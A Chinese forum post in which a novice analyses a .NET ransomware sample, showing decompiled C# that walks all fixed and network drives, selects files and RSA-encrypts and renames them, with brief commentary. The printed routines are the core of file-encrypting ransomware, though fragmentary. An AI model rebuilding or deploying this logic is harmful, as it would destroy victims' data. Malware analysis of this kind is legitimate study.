响应车长,反编译一波。
本人小白,没啥技术,就随便看看这毒
先简单执行一下
嗯,很好,虚拟机惨遭破坏
监控行为发现这破程序疯狂的在各个目录下面写入文件,毕竟勒索(笑)
大部分相同,但还是在一个单独的目录写入了一个log文件
虽然不知道是什么但还是感觉很厉害的样子
查下壳
.NET,果断反编译看看
[mw_shl_code=javascript,true]// ntmps.Form1
private void a(DirectoryInfo A_0)
{
this.b(A_0.FullName, this.j);
this.e(A_0.FullName);
try
{
string[] files = Directory.GetFiles(A_0.FullName, "*.*");
for (int i = 0; i < files.Length; i++)
{
string text = files;
foreach (string current in this.l)
{
if (text.ToLower().IndexOf(current) > -1 && text.ToLower().IndexOf(this.e.ToLower()) < 0)
{
string a_ = text;
string a_2 = text + "." + this.e;
this.c(a_, a_2);
}
}
}
}
catch
{
}
}
[/mw_shl_code]
[mw_shl_code=javascript,true]// ntmps.Form1
private void b(DirectoryInfo A_0)
{
try
{
DirectoryInfo[] directories = A_0.GetDirectories();
for (int i = 0; i < directories.Length; i++)
{
DirectoryInfo a_ = directories;
this.a(a_);
this.b(a_);
}
}
catch
{
}
}
[/mw_shl_code]
嗯,这些应该就是在遍历文件夹了
[mw_shl_code=javascript,true]// ntmps.Form1
private void h()
{
try
{
string[] logicalDrives = Environment.GetLogicalDrives();
for (int i = 0; i < logicalDrives.Length; i++)
{
DriveInfo driveInfo = new DriveInfo(logicalDrives);
if (driveInfo.DriveType == DriveType.Fixed || driveInfo.DriveType == DriveType.Network)
{
this.b(driveInfo.RootDirectory);
}
}
}
catch
{
}
}
[/mw_shl_code]
太狠了,遍历全部文件,估计有写入权限的它都写进去
怪不得虚拟机那么惨。。
[mw_shl_code=javascript,true]// ntmps.Form1
private string a(string A_0)
{
string text = "";
byte[] array = new byte[A_0.Length];
byte[] array2 = new byte[this.b];
byte[] bytes = new byte[this.b + 11];
double num = Math.Ceiling((double)A_0.Length / (double)this.b);
if ((double)A_0.Length < num * (double)this.b)
{
int length = A_0.Length;
int num2 = 0;
while ((double)num2 < num * (double)this.b - (double)length)
{
A_0 += " ";
num2++;
}
}
array = Encoding.Default.GetBytes(A_0);
Array.Reverse(array);
try
{
RSACryptoServiceProvider rSACryptoServiceProvider = new RSACryptoServiceProvider(2048);
rSACryptoServiceProvider.FromXmlString(this.i);
int num3 = 0;
while ((double)num3 < num)
{
Array.Copy(array, num3 * this.b, array2, 0, this.b);
bytes = rSACryptoServiceProvider.Encrypt(array2, false);
text += Encoding.Default.GetString(bytes);
num3++;
}
}
catch
{
}
return text;
}[/mw_shl_code]
中间根据一大堆引用的变量进行计算
应该就是在进行计算RSA私钥了
(反编译出来的变量一点一点追着看得疯,就不追那么具体了 )
[mw_shl_code=javascript,true]private void c(string A_0, string A_1)
{
byte[] array = new byte[this.b];
try
{
byte[] array2 = File.ReadAllBytes(A_0);
if (array2.Length / (this.c + 5) >= this.b)
{
RSACryptoServiceProvider rSACryptoServiceProvider = new RSACryptoServiceProvider(2048);
rSACryptoServiceProvider.FromXmlString(this.d);
byte[] array3 = new byte[array2.Length + this.c * 11];
byte[] array4 = new byte[array2.Length - this.c * this.b];
for (int i = 0; i < this.c; i++)
{
Array.Copy(array2, this.b * i, array, 0, this.b);
byte[] array5 = rSACryptoServiceProvider.Encrypt(array, false);
Array.Copy(array5, 0, array3, i * (this.b + 11), array5.Length);
}
Array.Copy(array2, this.c * this.b, array4, 0, array4.Length);
Array.Copy(array4, 0, array3, this.c * (this.b + 11), array4.Length);
try
{
File.WriteAllBytes(A_0, array3);
File.Move(A_0, A_1);
}
catch
{
}
}
}
catch
{
}
}
[/mw_shl_code]
激动人心的代码来了,各种文件数据读取加密写入一气呵成
总结
C#写这种勒索虽然快,但是想隐藏行为几乎是不可能的,这个代码完完全全暴露在反编译的软件下面
其行为也非常单一,无非就是采用RSACryptoServiceProvider之类的加密函数做加密,估计也没啥太大的花样
勒索软件这些东西越来越不厚道,照这毒这整法,实体机中招的话估计是没救了
|